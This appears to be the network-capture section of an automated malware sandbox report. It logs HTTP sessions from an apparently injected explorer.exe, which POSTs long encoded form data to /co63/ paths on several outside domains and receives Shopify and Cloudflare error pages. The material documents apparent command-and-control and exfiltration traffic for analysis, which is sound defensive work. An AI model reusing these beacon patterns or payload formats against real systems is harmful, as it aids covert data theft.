                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;
                                                      Jul 20, 2023 11:46:57.400513887 CEST | 1008 | IN
                                                      Data Ascii: line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font
                                                      Jul 20, 2023 11:46:57.400532961 CEST | 1009 | IN
                                                      Data Ascii: else til pne dette nettstedet" }, "th": { "title": "", "content-title": "
                                                      Jul 20, 2023 11:46:57.400551081 CEST | 1010 | IN
                                                      Data Ascii: per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie masz uprawnie dostpu do tej strony internetowej" }, "sv": { "title": "tkomst nekad", "content-title": "Du har inte beh
                                                      Jul 20, 2023 11:46:57.400568962 CEST | 1011 | IN
                                                      Data Ascii: h-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title": "Je hebt geen toestemming voor toegang tot deze website" }}; var language = nav
                                                      Jul 20, 2023 11:46:57.400583029 CEST | 1011 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      21 | 192.168.2.5 | 49732 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:59.543375015 CEST | 1014 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.mattewigs.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.mattewigs.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.mattewigs.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:46:59.800354958 CEST | 1166 | IN | HTTP/1.1 402 Payment Required
                                                      Date: Thu, 20 Jul 2023 09:46:59 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 275
                                                      X-Sorting-Hat-ShopId: 78317551892
                                                      X-Frame-Options: DENY
                                                      X-ShopId: 78317551892
                                                      X-ShardId: 275
                                                      Vary: Accept
                                                      Server-Timing: processing;dur=22
                                                      X-Shopify-Stage: production
                                                      Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b1581704-308b-4e6c-a1ae-fd5cbde2fccf
                                                      X-Content-Type-Options: nosniff
                                                      X-Download-Options: noopen
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b1581704-308b-4e6c-a1ae-fd5cbde2fccf
                                                      X-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1
                                                      X-Request-ID: b1581704-308b-4e6c-a1ae-fd5cbde2fccf
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IXPYbNXv81p5ihq%2BWy6ycY5YrXUF%2F0HnJSNGzPqZiS8kyGfKKunHQwd46PNOElI6wed6WlOG2fVVxBFD5hr%2BGWUhb7B7rNu6vHtzBkBPSD9ZKvy9qYEm
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 20, 2023 11:46:59.800379038 CEST | 1166 | IN
                                                      Data Ascii: dWJIOXW9NchD1Ht"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=240.999937Server: cloudflareCF-RAY: 7e9a47ba1bea9c0c-FRAalt-svc: h3=":443";
                                                      Jul 20, 2023 11:46:59.800404072 CEST | 1168 | IN
                                                      Data Ascii: 2b97<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-b
                                                      Jul 20, 2023 11:46:59.800429106 CEST | 1169 | IN
                                                      Data Ascii: x; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; } .content--desc-large { font
                                                      Jul 20, 2023 11:46:59.800453901 CEST | 1170 | IN
                                                      Data Ascii: sketch:type="MSArtboardGroup" transform="translate(-297.000000, -82.000000)"> <g id="well-be-back" sketch:type="MSLayerGroup" transform="translate(299.000000, 84.000000)"> <path d="M209.391799,46.714415
                                                      Jul 20, 2023 11:46:59.800478935 CEST | 1172 | IN
                                                      Data Ascii: 160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M0.458340557,61.6156981 L-0.149164087,54.5929811 C-0.410879257,5
                                                      Jul 20, 2023 11:46:59.800503969 CEST | 1173 | IN
                                                      Data Ascii: hapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="St
                                                      Jul 20, 2023 11:46:59.800563097 CEST | 1174 | IN
                                                      Data Ascii: 89,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.945962 63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.442
                                                      Jul 20, 2023 11:46:59.800587893 CEST | 1176 | IN
                                                      Data Ascii: .7766347,101.83517 75.7502693,101.68234 76.9808731,101.68234 C80.5580991,101.68234 87.0867399,103.040151 90.6212508,112.136604 C94.8432724,123.002491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2
                                                      Jul 20, 2023 11:46:59.800616026 CEST | 1177 | IN
                                                      Data Ascii: 5 54.3981084,145.327925 C55.5948111,145.327925 56.9054211,145.406717 58.3360402,145.577208 C59.4513808,145.70966 60.5321424,145.773509 61.5844272,145.773509 C80.1309474,145.773509 88.8862012,125.913057 84.8791115,113.518868 C82.8789567,107.330
                                                      Jul 20, 2023 11:46:59.800653934 CEST | 1178 | IN
                                                      Data Ascii: 412,115.678868 C39.2701579,115.678868 41.1672539,115.008453 43.2033437,113.685283 C43.618969,113.415623 43.8094923,112.934717 43.688805,112.460604 C43.5667616,111.981736 43.1640186,111.648226 42.6622848,111.610868 C39.8105387,111.396226 39.447


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      22 | 192.168.2.5 | 49733 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:59.563703060 CEST | 1027 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.mattewigs.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.mattewigs.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.mattewigs.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Ascii: aJElwV=(iuxAmKDoXH0JfhG0UCs4xzkVcgG0jEPWegC1yamGSacgEpCRaVAVGvcUpVc(k7jPwlB(qzDV6ouEoTJz07QY_KaUuMErQ5aKmFqaK5aVq0eScDlqepQjJhcRsE7OTPsLnN9r8AdjUv_bt6kD8RGNegyvEo-LG5hUoW7CNZahDoqvL5PkknNxYf4hOTgwhrhwWxwOHYvqUVAtpb3lVLsh94wAHqePSTYUrTPJTVcplvboANGaH7KA4UfHQsHhDmm3D0n(99U2r~-M8Sb7o2FJ8KCEIzEIDY3XwlLAFyZN1NEjoKjlNjOd3T2aycwenwBhkXJ3AIop_iuraa03xFGMZpMESbhMBX1uQu-pzSOTo6pZMtLRNmHQYSJrA3WL2H5guxXJbSdE43hb2f2ejE_DHeN807IsNqyg7d5vEb-RN2_VcFYqGMsdMwkpM4k3p3PCRvxaRCojEVAPY8PUkdkEWeIw9Nirw5v2n19ZBjgDmj1Drv7BU2kRtR45Q6_a-UC6yTlPdKQg4Si85m5DwjiWfbpNLHgB070hOuwzqbYW6QumgI6BjGEtdcrQWb-zd(c7wSF0EdCN42CiaUFYbd2ZtyaxbPGr2doQkyF6nO8X4WSSDWgEyV17KBzAXWfN97f0Wzc6dvkAyyWXLaSgHZk~MC_OeM96AY7hdB2OUtGxBbvm_lBCE6QviXCYIrCtFgJbCgG45xes_a7zGH9qUoMnTZ2rfy322P0BgjANqMwOimvmTv8aB8vTaRYmDYG50PxEOmDhAsKMoXx0ensdjF1FoT7AkqKDZ3Z~hCNY_bWdu8T8YwibCOOJP40QhZVOQsDC4JKB6rwjeK-iG4F415tkFXCDBdHo7sUwOupvTlRkMUO6wY422tAgXWu5JBgp_0DJOU7xYoWU19KTc9HqOc00o(PlwuhTUjfNUyLEL4gXKXHGX7PbsICwK1-wpeiXiHnVw37rlb76MlrEsTOdngQpY0iBdMtwo4UOjoCZFN-(9iIBY6KNIygSu6KZxbwb50JDygb03HxZ5YPgLh_I6Uz~rZcX5DyclsCp7moMAIyxkbIxlw3mQniXMlUaw1fjllZpW3WilIcHC5rEujuJccyaQUAl6JU(yPdokq1C5DuRUdbZqVsPmctI6sGtaWpiTW2y1EDq4NW3g1ZMCXDfcdxj7gKZjDEOGNIb2VsUcw0PKgjBx9aX-C5bqKSMR1sEZGoMBRK708QbVktDk0VKh3iPV1nYF0Ux5rW8jbSiDeAY_hyv5ASQmC57Ojhepi4O_bLh_6mg5FRugI7P7t-UUt-jNzKn4Z7XEKHXUj6Coi1pfTkCemKL1hiMOO3vII3dwjCV_IHnlPLxqjVxDkJMQw_IlVEHZYZcVOOZBE_a4LMAH2LBmfS~H1FBy9ajatKYsLs~z9rR9~kucIpkLv8Yscp(PYHNNt9FgWiKgH2x0NzVWwLobEghQ1OlJ3VnVHYIQLm~WZ0IWUzcXWHMab61X3nD66wiPPk9Qt33IvV3XE-nPffFhDYWlZsNBzkhjPD(hFtz4E2q1iif8HPaRxDn-oGfJ6antoaUMwvRDUGm-~S1RBinPEyVAYxnbWdEu5X14UtH53Fx95gCBy47IUjjvBC1Sp6owYiNDhsJDYAbA4mBWbVvpgG1GdiKteWZZVaelA8n3SOeOoWSw67H08cIykQh5rUwx4uOGXCeWufwFfckADJzYOIZUYfCRJohw6L99t9jWZiKGbrM6lYXE8wOW~HDyQCagp59c5tckvgVaCd1PpDETtp4T0wDB1CF0qH(DAj98(w6e(Cf1Z2ZEgY(-vxKEGfy4HxJnT0fa8Pr_pSaLFAx5f6r9ES(om6dzB-fDzm8V5sgAuQId(6Gd8xIV7gQea5UUypr9X5KtB1GYU0VIP8wwf81fx3to(uS2DvQ3mgzo1_(VT
u66PHubDeTDk4fsANlmJimkKvtks0JbC2uqdSl-AH(xK2i5IZrCN72VXPaw7SMmaXE8D6MXgcIWBgD60V0pE0j-HXe2jAaMuH3ShyAuVAXqTOeV8w2Xv493A9lgzIJWTb7CqzgR19beFp36zf6W2C7mMozBnXDBng3yw9KHaD0EUSvHeAg_G-Rk0xS_1b9WnjMgTSfWJIf31MaMCAEEl2tNXSGBkwsHvNGRiJq5bSGu59KJq1LYz8Eafj9x3pNnvWx92DZURFl1pT2X7fw_50ffskWnzPTHsNfiOtNZGw6qKSwSGJEmywL1ITsOrYqqsdXh5o~IafZ9MnQxBzJ2cZdok-iTj_o-1daxsEa8BAzi9NuivYFHTPStNo5EajUtryrZSvgVHtvkmfy7SWcXdn2mlCx-PBcGp78BE9jxtrHRfY8SDaZrSqRQIbKij2uUMKKnmkPNpEMtxbdrKbMkjov5BI(NCtoLogPLG7zntfblGwip2BKqp4QCkLvewA9V8PJc0Rjt3Zup6ImFGUtIJLKK4RAtwd4r5Uh-QhiEt1UGI9GFhkt-iyzK6yfdtudz1PjQB8i-OooX(sF8wfSL(H0kHs6Z9Bmm5ByLtDrzh997mxvbt4wU8T8uLaQjTkCaCNfQateUwJmom7zQ48H_Z63qhsx-phVYyAiFud3357aOQrjfrAfi6QvWX3hiStBAlKogi22UbTG_dCOZ6IpJ~-tpngEBj1PLmHCcNYVNHQf8tQWxD6BXPJDMz9LndVgtqH2T4MmxJ1LJ(ljRcxkEiyS_AYLXZaoJFwF7WBKgYwACMhMvSUC2KjhfAIZQfMrBzJ9MuXU1iEVt(dl604GEFEn8RZoviOjEEKsZOZxJbbyBqfGmCVxggTSSj3lYQeMDEQQg0-eoY0QInLQ3PerDTjknNwQmpLaQ6FqdpwBiNIswguyK9itSJqZaAEs5oQ3RK4D0A9iAjtjLBHLNfYJMLDDOL7ohnmRl1u43oNwWlfO1rwKOsq8pY_6LQDov0H6rJQ2BDdBMEbjrJ-bNSobm(f1qJNrryujYpnQ9RfjEhAevicHxzSTi(qJoSBu1gQkil5MhY9XCSBH8bgdQO9oDdKiKYIwyxHHT7HQzYtDPERTP7mQJuIS_SWNjs1yR3j19UWL5R8liQwUJQXoZ4JZrKR8zqM44gMFhSCGSHFaZCqxHtBBSSFfLZ3AZKuSrwqiK3zYh6CrgVuBALIbDeah1zbwQr3SBO_617kkX8xdOToUJmkHTjjtoe4lJeHjFyt8AZvnnNNo7P9jPGLc-0rTOEBrVLP2w3n9_3GPQy7gsnKsjp3V2oRaR9kd4wjra6vkqmz4KzlZY0iLC1Ggx8LRyoKffQsKjo0V-tVgQxGiexdN7pgwZoNhHsI3VLD8_mk~8m3vW~BEdT9FDPn4is0im~I35ZIsOh3b820w8wQoSDGKeGGO9HtZqch8MVffK50g1Tk3izRfZE9pa6_2Y9XribFJ5bNdK(GB9IpBBCzawgklk1sgMkdNCQckb6D2xM6wPGARFPLk2Ps8nWTDTJ8w_f_iJ4Q9QDyJdF52mUz(EPIcLNF9-RSxYPvl80Xv4eXTuAy4h2MrfV_~0B69cR6cdVc6-n7KGWRMLB_PSi_Gjkni_SCvm68Z4alIsvU3WQTxC92daf-(c5LR62ygcnS3CSv~hCRbQg1TAfzwGw4qhVsaXbjU-gxbCTus1qFeNn86Es8Idy1oGa3ub~6azcbVnK_zgn9z7xD9YPTMcEM1oyYzGnJowUGxZNiMLe_htFyM98h1G42VgzHLEMrc-r33pt2rbeJpmPHRs0BSUjKWCYTKCCCnzmke4noCTzN9Xca0307rkGGs-Bv6uUVBnvrAM0Q5OC3m-V3ohzTYs5pB4IzH0ZhNnlCZZAq6xMUL6ndJ9mz6K7bYF9x7URwAFd9d4fMSNzRBrduMOdDmY3UKws5iQ0gGGApEEtQttJcIXx_J0JK8Nbt8uO-iCV-Qja
MIHlmHcyOAkAPrl3HeEPH1AIZJYPbDcspOal-ekX9(s9uayiAFWtU7-amJk~rGORI9OpuF1sLS2V33wqzD0B7rc14g1DuQZD4Oh4FuUtzieFp50Bnx0FzYw4B7gk7lg038h7dKtYn9SkYwWHhxO37Ngi
                                                      Jul 20, 2023 11:46:59.580430984 CEST1037OUTData Raw: 6d 67 7a 67 4f 4c 6c 75 71 4b 65 6c 75 35 32 64 6d 54 50 61 65 4a 49 48 70 48 6e 68 6e 32 55 54 31 56 49 58 32 38 74 7a 39 31 66 47 76 4e 78 58 65 4f 70 58 62 4b 46 51 62 70 78 73 4f 64 6a 44 76 58 7a 78 36 53 2d 4b 4f 37 73 5a 56 28 6a 49 57 28
                                                      Data Ascii: mgzgOLluqKelu52dmTPaeJIHpHnhn2UT1VIX28tz91fGvNxXeOpXbKFQbpxsOdjDvXzx6S-KO7sZV(jIW(xGQu9sDmt4lbGP41R(QYhlYTdY3pyoBuIFsavpXZR(ngrNdd3IQ80znzGggO3wGKrryzY8ZLT2rU3hrCzwzSbIDqogCOY8HmWmEZu5DsHaorrbiF958TYtw9peD7i~iU5oH8PZOzp1pYy6HnCpuNy9qoajfjLF-jB
                                                      Jul 20, 2023 11:46:59.580509901 CEST1052OUTData Raw: 73 28 42 4f 4f 77 39 30 79 30 63 5a 49 48 30 51 48 62 50 73 49 37 4c 30 30 69 32 59 54 59 70 43 49 6e 35 50 6b 53 46 77 4f 46 50 75 54 55 6e 6c 42 47 5a 59 43 6a 34 6f 68 70 55 4b 43 7a 54 72 77 79 56 69 59 35 54 31 6f 62 48 58 6d 74 63 49 67 7a
                                                      Data Ascii: s(BOOw90y0cZIH0QHbPsI7L00i2YTYpCIn5PkSFwOFPuTUnlBGZYCj4ohpUKCzTrwyViY5T1obHXmtcIgzKvU62XSeDWqsRtMpXJ3f0gJMHzIifH-a8OhoNh08MKAY6J49n39(XUfjhU5tPOqWGiMctNNne7bt4HIdAYmBHq1HMUaKUZg6r5i~r9Rvv8VFO3Xw822~wGo5iRELogfD9j6w2bH4fDmgtdADCTi8g(3z8trN7cWRh
                                                      Jul 20, 2023 11:46:59.597090960 CEST1055OUTData Raw: 63 76 74 66 74 34 6a 68 70 35 73 42 44 58 52 37 61 53 72 47 67 4a 63 6d 76 4a 37 56 32 36 77 61 34 42 69 6c 53 46 39 77 30 7a 4e 7a 6b 7a 43 6b 55 4b 57 57 52 46 74 58 47 36 61 55 58 4d 36 6e 37 34 35 64 35 53 74 64 45 36 64 72 56 68 43 59 4f 7e
                                                      Data Ascii: cvtft4jhp5sBDXR7aSrGgJcmvJ7V26wa4BilSF9w0zNzkzCkUKWWRFtXG6aUXM6n745d5StdE6drVhCYO~EIAdpzNS1BEVjG4md32M9jXImqOMNm-ancI4JMCywOk65sqcoBgFKOw1JbX~JlLlfnhIBMabss7NsQnQwZ1Vhb_4zW30S2O7PND2sZEoZPySxM4HR2jK1HNIZMmCOIPbt6sQ45WDhbacRrgA8zD0Rhg2_mAfOke3Y
                                                      Jul 20, 2023 11:46:59.597245932 CEST1073OUTData Raw: 73 28 4a 69 71 7a 6a 61 56 73 58 49 69 77 46 53 50 59 73 41 31 75 7a 33 70 51 69 67 43 4e 35 4a 52 45 6a 71 6d 51 4d 32 5a 79 65 7e 75 54 54 50 44 57 61 44 58 36 6f 38 50 53 4e 74 72 62 46 30 4d 57 57 70 72 74 36 76 70 78 32 32 61 56 64 41 52 62
                                                      Data Ascii: s(JiqzjaVsXIiwFSPYsA1uz3pQigCN5JREjqmQM2Zye~uTTPDWaDX6o8PSNtrbF0MWWprt6vpx22aVdARbLRWM1O3O4i4Q9JC2MAchYx4ADZQRQqylTxwyQzG5e7g2p44XW1Y8C5qPJIF096brNcOmyliW8QSASnsi7DclMnkuAdoMIHRPvkP9itLrcVJtyFNtMg15EaMt0JhtTgXoGDHC-m_BAkZzPFy4Z5e6Q7QMRAnJRLo7q
                                                      Jul 20, 2023 11:46:59.597282887 CEST1078OUTData Raw: 6f 42 78 38 59 70 72 37 52 32 69 63 31 42 36 42 75 32 76 35 4f 59 72 72 59 6b 32 79 43 39 39 62 4e 45 53 36 72 63 37 63 4a 50 2d 62 48 64 54 46 42 6b 6f 33 37 76 71 72 63 69 48 42 73 73 71 6d 69 42 68 30 45 56 67 74 38 28 74 54 2d 48 4c 4c 51 28
                                                      Data Ascii: oBx8Ypr7R2ic1B6Bu2v5OYrrYk2yC99bNES6rc7cJP-bHdTFBko37vqrciHBssqmiBh0EVgt8(tT-HLLQ(YOnTd2Mf_WscnFlubeeeYNtOphxWrg0(Ife1rxaNNwaTAEY8jRLXvGnRh2qMcRk9mJP02qPBx0fVMSn3U6IQQH5VCvctf1nUJdH3eqxBRi8vI(YQJcssQTwYO~fdZzE1TVUerzCOvo_jNAu19gpDVMBSv~3eKLfmh
                                                      Jul 20, 2023 11:46:59.597589016 CEST1100OUTData Raw: 49 46 38 75 50 65 5a 62 4e 6f 6e 34 67 6d 75 64 4c 6d 6b 46 69 64 78 79 67 4d 78 6a 37 4d 2d 48 6b 4e 6e 59 4f 4a 76 39 57 46 46 4d 77 4d 70 68 50 67 43 61 42 6d 65 63 74 43 36 56 42 48 71 50 69 4a 43 7a 4e 68 37 77 32 69 77 46 37 4f 34 42 31 47
                                                      Data Ascii: IF8uPeZbNon4gmudLmkFidxygMxj7M-HkNnYOJv9WFFMwMphPgCaBmectC6VBHqPiJCzNh7w2iwF7O4B1GekQ44kkWkWuDQ1srarqLaQhc28YCzGG0bdqiB(TAFwrLTPy2MhPHEMN8n1EnHcDxEZtYdGJWmPsf2CZ58OJaU6CJO(GT4IPdgzVV7SYhp(ry7xRzHFpIIB6N_YcAwbirEfOCRnr8QRus-(krbnsXLvx3qlQy922rg
                                                      Jul 20, 2023 11:46:59.613662958 CEST1103OUTData Raw: 43 42 5a 50 55 7e 4f 38 78 6f 79 6a 71 4c 4f 70 6c 46 32 72 6b 46 6a 53 4e 64 74 64 43 31 61 37 32 6a 34 4f 4b 6b 6b 4e 64 74 76 53 4a 6c 79 53 75 6d 68 6b 65 43 5f 35 49 37 6e 6f 56 64 74 62 71 46 49 55 79 6d 5f 53 47 45 78 7a 6f 41 74 70 70 7e
                                                      Data Ascii: CBZPU~O8xoyjqLOplF2rkFjSNdtdC1a72j4OKkkNdtvSJlySumhkeC_5I7noVdtbqFIUym_SGExzoAtpp~aWS7FlCHaSRYURyHqmW7iO3S8ixshHyFuIM9CPotNr3taLtfHXa6vvq4d(TtvWKrXA1jcC3SaWHiop61NL6~olw~rpqwGlWwQMJ8bBlcu9Px2XaZ1BjwTTM~i8nOM95nzpaA7y_PzyfCsBQ~xDtcL1G00w24c~vh3
                                                      Jul 20, 2023 11:46:59.613708973 CEST1108OUTData Raw: 2d 73 32 51 62 62 68 79 78 54 53 7e 64 50 4e 67 49 65 4a 28 45 4a 39 69 51 28 4f 48 74 5a 64 71 72 57 39 57 45 54 55 6f 4b 56 58 43 41 52 4d 74 42 67 6c 56 6e 76 72 65 70 6b 4e 5a 54 6a 58 5a 43 4a 4b 66 5a 58 6a 7e 63 68 59 6b 37 49 64 32 68 39
                                                      Data Ascii: -s2QbbhyxTS~dPNgIeJ(EJ9iQ(OHtZdqrW9WETUoKVXCARMtBglVnvrepkNZTjXZCJKfZXj~chYk7Id2h9zS3DpkUewsiuPX-B55XLRTa4o2dE9A_KtCvbqSx4-9oet2SvS0Bc0xMrSUukSVqe_hrHbwk3E8aSw51BuHHSuJOtwqjpeLza7VP3avTZS5NaNV-KWntyf1STPEajXykvCMhWr4PLXySbGxDb4X8xNZGXLnkDqdd3b
                                                      Jul 20, 2023 11:46:59.613753080 CEST1116OUTData Raw: 55 69 74 34 70 6f 4c 37 43 59 76 6f 38 4f 39 48 47 7a 51 68 4e 33 35 37 57 78 77 7e 74 52 30 70 6a 76 32 31 59 4d 56 72 39 4c 69 43 48 30 45 4b 64 34 76 28 75 4b 52 42 48 6e 4e 49 49 34 75 49 59 7e 4f 6c 48 4a 71 67 50 53 6c 70 57 47 52 41 62 52
                                                      Data Ascii: Uit4poL7CYvo8O9HGzQhN357Wxw~tR0pjv21YMVr9LiCH0EKd4v(uKRBHnNII4uIY~OlHJqgPSlpWGRAbRwad1LzVDQ~wwt24~Zz1sRmwKIdRS6nJGbidUHkDa3qXjPD0vzzx2E~I1s4px-(fTLrIqA0UpcPNz_E7J8s_rkWDTbAtRW7d08xghfXVUkOrtOUYR7Q93Vc92msBbq4gV4uVyUgiL906mNfLAJ3TO4i8kucuybvfXk
                                                      Jul 20, 2023 11:46:59.614639997 CEST1129OUTData Raw: 36 35 71 54 37 30 37 44 34 66 6b 70 5a 61 6a 68 77 53 62 76 44 54 37 36 34 31 6c 6d 65 44 62 71 66 48 46 4b 53 37 74 43 6e 50 56 55 61 79 57 6b 59 36 41 6e 46 76 66 50 34 58 7a 38 75 44 32 5a 69 35 36 62 36 72 4d 6a 76 75 76 6c 73 59 55 59 6e 58
                                                      Data Ascii: 65qT707D4fkpZajhwSbvDT7641lmeDbqfHFKS7tCnPVUayWkY6AnFvfP4Xz8uD2Zi56b6rMjvuvlsYUYnXTcwtnhFY8P4C2n_3wx7w-KPNDZW58Yh1Wc-6_7Ka8gIvxe0HudGYOmldvV3fdKmhYjmEXSSf6uIAu2meK6KALjmnQurai4Yn_HalRKwdZuiXQDuAPicggpCJIPIpFwwxuNoJ6N4w_hMJDezWpCO9seKxhM1fCMkXS
                                                      Jul 20, 2023 11:47:00.118531942 CEST    1192    IN    HTTP/1.1 402 Payment Required
                                                      Date: Thu, 20 Jul 2023 09:47:00 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 275
                                                      X-Sorting-Hat-ShopId: 78317551892
                                                      X-Frame-Options: DENY
                                                      X-ShopId: 78317551892
                                                      X-ShardId: 275
                                                      Vary: Accept
                                                      Server-Timing: processing;dur=26
                                                      X-Shopify-Stage: production
                                                      Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b5755be8-b3ad-4420-ba97-0fa1ee78048b
                                                      X-Content-Type-Options: nosniff
                                                      X-Download-Options: noopen
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b5755be8-b3ad-4420-ba97-0fa1ee78048b
                                                      X-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1
                                                      X-Request-ID: b5755be8-b3ad-4420-ba97-0fa1ee78048b
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LoEz99bmhVljZVFAucYeje2iBGamZ0dFb12M5QZ1VfK%2BiYpQZKT%2Bz3u61ASTEJ5SK12mV%2BCcYUZPjV%2B84NX0G0IFuTgwRqjylzZgpinsz5IGwfsiun


                                                      Session ID    Source IP      Source Port    Destination IP    Destination Port    Process
                                                      3             192.168.2.5    49714          172.67.215.254    80                  C:\Windows\explorer.exe
                                                      Timestamp    kBytes transferred    Direction    Data
                                                      Jul 20, 2023 11:44:50.607834101 CEST    163    OUT    GET /co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.saleschildcarriers.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:44:50.752696991 CEST    164    IN    HTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 20 Jul 2023 09:44:50 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: https://www.saleschildcarriers.com/co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH-
                                                      Strict-Transport-Security: max-age=31536000
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2LKVhN5b3wO%2BSzD%2F%2Fzgq9Bg5mgHW9xOBXsfhwGNRM0GBx2s6wrL%2BebnWtYOi%2BLTEVvvZpjh7%2BFAZ6eGVuaKjD8apijc34gMrzRu5KzefAzavr5v8ErbegST1hnIXrRWDy9WCkf7EaREkdp7Chw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 7e9a44944f4a9158-FRA
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
